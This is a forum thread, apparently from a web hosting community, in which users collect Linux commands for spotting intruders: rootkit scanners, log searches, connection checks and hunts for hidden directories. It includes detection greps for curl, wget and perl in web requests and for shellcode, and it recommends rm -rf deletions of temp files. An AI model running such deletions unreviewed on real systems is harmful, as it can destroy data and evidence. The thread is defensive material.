Page 1 of 2 12 LastLast
Results 1 to 25 of 28
  1. #1
    Join Date
    Apr 2006
    Posts
    520

    How-to detect a possible intruder ¿?

    Advise: this are steps recompiled from the network and a from some books, these were not done by me.

    Hello..

    I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter, so please, post your tips and tricks about this subject.

    1.- Download and run Rkhunter & Chkrootkit
    2.- Run "w", and "netstat -nalp |grep "SHPORTHERE" to see whos connected using SSH
    3.- Search for ssh and ftp accepted logins.
    Code:
    last
    cat /var/log/secure* | grep ssh | grep Accept
    cat /var/log/secure* |grep ftp |grep Accept
    less /var/log/messages | grep ftp
    4.- Watch current connections and scan your ports.

    Code:
    netstat -nalp
    nmap 1-65535 localhost
    5.- Search for suspicious content on common explotable dirs.

    Code:
    rm -rf /tmp/sess*
    rm -rf /var/dos-*
    rm -rf /var/tmp/ssh-*
    rm -rf /var/tmp/dos-*
    ls /tmp -lab
    ls /var/tmp -labR
    ls /dev/shm -labR
    ls /usr/local/apache/proxy -labR
    ls /usr/local/samba -labR
    6.- Checking for anomalies on this files.
    Code:
    less /etc/passwd 
    less /etc/shadow
    less /etc/groups
    7.- Search for new users at sudoers, check wtmp and telnet is not running.

    Code:
    cat /etc/sudoers
    who /var/log/wtmp
    cat /etc/xinetd.d/telnet
    8.- Find bash history files

    Code:
    find '/' -iname .bash_history
    9 .- Verify the Crontab table

    Code:
    crontab -l
    10 .- Update the slocate database and search for exploits.

    Code:
    updatedb &
    For cPanel servers:
    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
    For Ensim servers:
    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
    Search for shell code:

    Code:
    cat /path/of/your/web/logs/* |grep "/x90/"
    11.- Search for hidden dirs

    Code:
    locate "..."
    locate ".. "
    rlocate " .."
    locate ". "
    locate " ."
    12.- Search for perl-scripts running

    Code:
    ps -aux | grep perl
    13 .- Checking nobody user and open files.

    Code:
    service httpd stop
    lsof -u nobody
    Please, add your tips and tricks about this.
    Last edited by sh4ka; 05-22-2007 at 01:51 AM.

  2. #2
    Dude, rock'n thread. That was the single most useful thing I've read & as a relative linux noob with security issues, I have had to do a lot of Google'n.

    Beauty work. Really. Pretty much what every noob to linux security & bash needs to know to have any sort of "ability" to counter hackers. The bash_history bit was the best. So damn useful.
    Sell Digital Goods with DigiVendor
    Web Hosting Automation with PhpHostBot

  3. #3
    Join Date
    Apr 2006
    Posts
    520
    Glad to hear that.

    Here there is another tip to track exploits in temp dirs, its a bash script:

    Code:
    #!/bin/bash
    for x in "/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp"; do ls -loAFR $x 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web " | grep -E "^$|^/|/$|\*$|\.pl$" | tee exploits.txt; done; echo -e "\n\nPossible Exploit Files and Directories: `grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' '`" | tee -a exploits.txt
    I also hope to have the experts of this forum posting their rules to track hackers.
    Last edited by sh4ka; 05-22-2007 at 06:05 AM.

  4. #4
    Also try this - ossec.net

  5. #5
    Join Date
    Apr 2006
    Posts
    520
    Cool.., i will test this .

    Any other suggestions ?

    Thanks

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    rm -rf /tmp/sess*
    alot of times attackers will save their files to look similar to session files.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  7. #7
    Join Date
    Apr 2006
    Posts
    520
    Oh.. thanks, i will correct that.

  8. #8
    nice i will put this to use, lol u did a good job at explaining this.

  9. #9
    Join Date
    May 2004
    Posts
    98
    This is an excellent thread. Bookmarked this one.

  10. #10
    Thanks, this is very useful
    ServerTweak Networks, LLC >> ServerTweak.com
    Experience the fastest network and superior servers, feel the power of ServerTweak!
    Fremont, CA DataCenter | Dedicated Servers | Colocation | Cross Connects HE.net | 1/4 - Full Cab Sales

  11. #11
    great info! thanks

  12. #12
    Join Date
    Sep 2007
    Posts
    48
    How would you compare OSSEC to Osiris?

  13. #13
    thanks man.

    cat /path/of/your/web/logs/* |grep "/x90/"

    What does this thing do?

    Is there a script to search my whole server to see if there is a shell file?
    Chad Michael Murray >> House of Wax

  14. #14
    This is outdated...
    This can be easily bypassed using asm or binary lol.....

  15. #15
    thanks! good info!

  16. #16
    Join Date
    Jan 2008
    Location
    India
    Posts
    11
    Thanks for such informative thread...It will help many of us

    Good job
    Keep Smiling !!

  17. #17
    Is there anything that automates doing this on a regular basis & put it off-server (e.g., emails it out)? My fear would be a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.

  18. #18
    Join Date
    Apr 2006
    Posts
    520
    You can always write a shell script and sent results by mail, and believe me, a good cracker already knows about all this stuff.

  19. #19
    Join Date
    Aug 2004
    Posts
    142
    This is kinda of old

  20. #20
    This is kinda of old
    But, still useful. Glad to have seen it once it got popped to the top of the reading list.
    edgedirector.com
    managed dns global failover and load balance (gslb)
    exactstate.com
    uptime report for webhostingtalk.com

  21. #21
    Quote Originally Posted by toby27 View Post
    thanks man.

    cat /path/of/your/web/logs/* |grep "/x90/"

    What does this thing do?

    Is there a script to search my whole server to see if there is a shell file?
    This might be an old post but... That line searches files for shell code. Shell code doesn't have anything to do with the Linux shell. It's machine code that an attacker attempts to execute on your server by using scripts or applications called "exploits". Basically, an exploit will attempt to (ab)use a vulnerability in an application (ie: a buffer overflow vulnerability) to inject shell code (ie: code that listens on a port and binds a Linux command line to it) which is then executed by the CPU. For more information I recommend searching Google for the article "Smashing the stack for fun and profit". It's heavy literature for newbies but it's worth reading.

    About the OP: Most of the techniques explained above are really basic and will only detect possible attacks by 'newbie script kiddies'. I recommend installing an advanced IDS such as Snort or TripWire. If you're running cPanel, install ConfigServer Firewall since its LFD tool will monitor a lot of things on your server and send you notifications via email if it detects something that you might want to look into. For those who do not use cPanel: Use LSM and BFD from R-fx Networks.

    Off course, the best way is to focus on intrusion prevention/avoidance and not only intrusion detection.

  22. #22
    Join Date
    May 2007
    Posts
    442
    What is LSM?

    BFD = Brute force detection on APF firewall, correct?

  23. #23
    Thank you for posting this, guys!

    I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotations but it still shows up and won't go away?

    I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!

  24. #24
    Quote Originally Posted by gpl24 View Post
    What is LSM?

    BFD = Brute force detection on APF firewall, correct?
    Correct. LSM = Linux Socket Monitor.

    Quote Originally Posted by mifbody View Post
    Thank you for posting this, guys!

    I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotations but it still shows up and won't go away?

    I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!
    Maybe it's not a space but a hidden ALT+0160 character? Just guessing.

  25. #25
    Join Date
    Jun 2003
    Posts
    367
    Quote Originally Posted by wdr1 View Post
    Is there anything that automates doing this on a regular basis & put it off-server (e.g., emails it out)? My fear would be a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.
    This is generally why you log to a secure syslog server.
    Common sense is not so common.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •